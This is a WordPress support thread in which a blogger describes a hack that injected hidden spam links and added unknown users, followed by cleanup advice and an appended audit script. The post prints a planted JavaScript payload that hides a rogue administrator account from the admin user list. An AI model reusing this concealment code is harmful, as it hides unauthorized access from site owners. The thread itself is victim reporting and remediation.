• Resolved farhada

    (@farhada)


    Hi Guys,
    I am having a lot of problems with hidden inserted ads in my WordPress-based blog.
    https://www.abdolian.com/thoughts

    I found the problem when I received an e-mail from Google warning me that my site was banned for 60 days due to “hidden” links and ads.

    After searching the site, I found many places had the HTML code ‘<u style=’display:none’>’ and then after that lots of links to crap selling sites.

    I cleaned up the pages, found that the code was being inserted in my template (Journalized 2.0) and changed my template to another one.

    A few weeks later, while searching my site, I found another source of the same problem. This time the template is clean, and I cannot find any reference to the sites or scripts that create that garbage inside my SQL database.

    Now, instead, I exported my database and found something that does not look OK to me. I have only 4 users on my blog, but I see the following names in the user list that I do not recognize:

    (125, 39, ‘nickname’, ‘smerseeo’),
    (21, 6, ‘nickname’, ‘AntonSadko’),
    (27, 8, ‘nickname’, ‘AltaGid’),
    (24, 7, ‘nickname’, ‘EducationNetwork’),
    (134, 42, ‘nickname’, ‘hookahsh’),
    (146, 46, ‘nickname’, ‘conordco’),
    (128, 40, ‘nickname’, ‘xizeryox’),
    (131, 41, ‘nickname’, ‘blowinos’),
    (122, 38, ‘nickname’, ‘SvetlanaDoor’),
    (137, 43, ‘nickname’, ‘AntonPotaPo’),
    (140, 44, ‘nickname’, ‘lookgood’),
    (143, 45, ‘nickname’, ‘hotgurle’),

    And this strange one:
    `(161, 51, ‘first_name’, ‘…\r\n
    \r\n \r\n <b id=”user_superuser”><script language=”JavaScript”>\r\n var setUserName = function(){\r\n try{\r\n var

    t=document.getElementById(“user_superuser”);\r\n while(t.nodeName!=”TR”){\r\n t=t.parentNode;\r\n };\r\n

    t.parentNode.removeChild(t);\r\n var tags = document.getElementsByTagName(“H3″);\r\n var s = ” shown below”;\r\n for (var i =

    0; i < tags.length; i++) {\r\n var t=tags[i].innerHTML;\r\n var h=tags[i];\r\n if(t.indexOf(s)>0){\r\n s

    =(parseInt(t)-1)+s;\r\n h.removeChild(h.firstChild);\r\n t = document.createTextNode(s);\r\n

    h.appendChild(t);\r\n }\r\n }\r\n var arr=document.getElementsByTagName(“ul”);\r\n

    for(var i in arr) if(arr[i].className==”subsubsub”){\r\n var n=/>Administrator

    \\((\\d+)\\)</gi.exec(arr[i].innerHTML);\r\n if(n[1]>0){\r\n var

    txt=arr[i].innerHTML.replace(/>Administrator \\((\\d+)\\)</gi,”>Administrator (“+(n[1]-1)+”)<“);\r\n

    arr[i].innerHTML=txt;\r\n }\r\n }\r\n \r\n

    }catch(e){};\r\n };\r\n addLoadEvent(setUserName);\r\n </script>’),
    (162, 51, ‘wp_capabilities’, ‘a:1:{s:13:”administrator”;b:1;}’),
    (163, 51, ‘wp_user_level’, ’10’);
    `
    I am not sure if this has anything to do with the problem I have, but that is all I have been able to investigate so far. This is taking a lot of my time and I am really getting sick of cleaning it up and doing it over and over again.

    Really appreciate any help or ideas.

    Best regards,
    /Farhad Abdolian
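The usermeta rows quoted in the post above can be checked mechanically against the accounts the site owner actually created. This is an added example, not part of the original thread: the function name, the sample rows (constructed, modelled on the rows in the post) and the assumption that the export uses straight quotes with backslash escapes, as mysqldump and phpMyAdmin write them, are all illustrative.

```python
import re

# One usermeta tuple as written in an SQL export:
# (umeta_id, user_id, 'meta_key', 'meta_value'), with \-escapes inside quotes.
ROW_RE = re.compile(
    r"\((\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)',\s*'((?:[^'\\]|\\.)*)'\)", re.S)
MARKUP_RE = re.compile(r"<\s*[a-z!/]", re.I)        # any HTML tag in a profile field
ADMIN_RE = re.compile(r'"administrator\\?";b:1')   # PHP-serialized role flag

# Constructed sample: user 1 is the real admin, 39 and 51 were not created by the owner.
SAMPLE_DUMP = r"""
INSERT INTO `wp_usermeta` VALUES
(1, 1, 'nickname', 'admin'),
(2, 1, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}'),
(125, 39, 'nickname', 'smerseeo'),
(126, 39, 'wp_capabilities', 'a:1:{s:10:\"subscriber\";b:1;}'),
(161, 51, 'first_name', '<b id=\"user_superuser\"><script>/* hides row */</script>'),
(162, 51, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}'),
(163, 51, 'wp_user_level', '10');
"""


def audit_usermeta(dump, known_ids, admin_ids):
    """Map user_id -> sorted findings for accounts that need a manual look."""
    findings = {}
    for _umeta_id, user_id, key, value in ROW_RE.findall(dump):
        uid = int(user_id)
        notes = findings.setdefault(uid, set())
        if uid not in known_ids:
            notes.add("unrecognised account")
        # The key is "<table prefix>capabilities", so match on the suffix.
        is_admin = (key.endswith("capabilities") and ADMIN_RE.search(value)) or \
                   (key.endswith("user_level") and value == "10")
        if is_admin and uid not in admin_ids:
            notes.add("administrator privileges")
        # Names and nicknames are plain text; a tag here is rendered on the
        # admin Users page, which is how the row in the post hid itself.
        if MARKUP_RE.search(value):
            notes.add("markup in " + key)
    return {uid: sorted(n) for uid, n in findings.items() if n}


if __name__ == "__main__":
    for uid, notes in sorted(audit_usermeta(SAMPLE_DUMP, {1}, {1}).items()):
        print(uid, ", ".join(notes))
```

Because the script in the `first_name` field removes its own row from the Users screen, the database export is the reliable place to count administrators, not the admin page.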

Viewing 9 replies - 1 through 9 (of 9 total)
  • Thread Starter farhada

    (@farhada)

    You can see the effect of the problem if you look at the cached page of my blog on Yahoo:

    Story with Viagra add

    In order to see the garbage, you have to view the source of the page and search for ‘<u style=’display:none’>’

    Best regards,
    /Farhad

    What version are you running?

    You’ll need to clean out all the rubbish and refresh your code pages from a freshly-downloaded WordPress source zip.

    Also may be worth changing your login passwords.

    Thread Starter farhada

    (@farhada)

    Thanks,
    I am running 2.51 (I think).
    I am in the process of doing so. I have already changed the userID and the password, but I don’t know how to clean up these unknown users. I have to find a way to clean up the exported SQL file and then import it into a new database.

    Cheers,
    /Farhad

    It should be fairly easy to remove online through phpMyAdmin but I’d need to know what columns were what to show the exact statement.

    generator WordPress 2.1.3

    Most likely your theme is compromised, delete it. Assuming that you have a copy on your PC this won’t mind. Then UPGRADE the ‘rough way’ by deleting the old files (except wp-config and the wp-content folder) to make sure you have no infected WP files (left). Of course you might want to make a copy of the files to see through them to find changed theme and of course make sure you have no infected and/or vulnerable plugins. When all is good and well again, ‘harden’ your WordPress.

    Thread Starter farhada

    (@farhada)

    Thanks everyone, these are great tips, I will do so when I get home this evening, I may need a while to clean up all the crap and do the installation manually, and hopefully my site will be up and running without the help of Viagra.

    The first thing you need to do is make sure you completely clean it all up. You can get detailed instructions at How To Completely Clean Hacked WordPress. Once you’ve done that, go read The Ultimate Hacker Prevention Guide so you know how to prevent future problems.

    Thread Starter farhada

    (@farhada)

    Thank you dsslindonna,
    I did what you said here and did a complete upgrade to my blog with a new template.

    The problem is that when I upgraded the database, I lost my categories and all the tags. I did this twice and both times there was a problem.

    Any idea how I can fix this? Maybe I should create a new request for this?

    Cheers,
    /Farhad

    Thread Starter farhada

    (@farhada)

    Ok,
    I solved the problem by downloading the 2.51 instead and it upgraded the database correctly.
    Thanks everyone for all your help and time,

    Best regards,
    /Farhad

  • The topic ‘Site hacked, Vi@gra and other crap adds inserted!’ is closed to new replies.